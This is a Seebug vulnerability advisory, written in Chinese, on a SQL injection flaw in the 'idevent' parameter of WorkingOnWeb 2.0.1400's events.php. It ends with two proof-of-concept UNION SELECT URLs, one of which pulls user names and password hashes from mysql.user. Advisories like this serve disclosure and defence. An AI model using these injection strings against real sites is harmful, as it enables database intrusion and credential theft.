Lucene search

K
seebugRootSSV:2505
HistoryNov 27, 2007 - 12:00 a.m.

WorkingOnWeb Events.PHP SQL注入漏洞

2007-11-2700:00:00
Root
www.seebug.org
9

WorkingOnWeb是一款基于PHP的WEB应用程序。
WorkingOnWeb不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息或操作数据库。
问题是由于’Events.PHP’脚本对用户提交的’idevent’参数缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或可能操作数据库。

Flor de Utopia WorkingOnWeb 2.0.1400

目前没有解决方案提供:
<a href=“http://www.workingonweb.com/” target=“_blank”>http://www.workingonweb.com/</a>


                                                http://www.example.com/events.php?idevent=-1/**/union/**/select/**/concat(user,0x203a3a20,password),null,0,0,0,0,0,0,0/**/from/**/mysql.user/*
http://www.example.com/events.php?idevent=-1/**/union/**/select/**/user(),2,3,4,1,1,1,1,1/*
h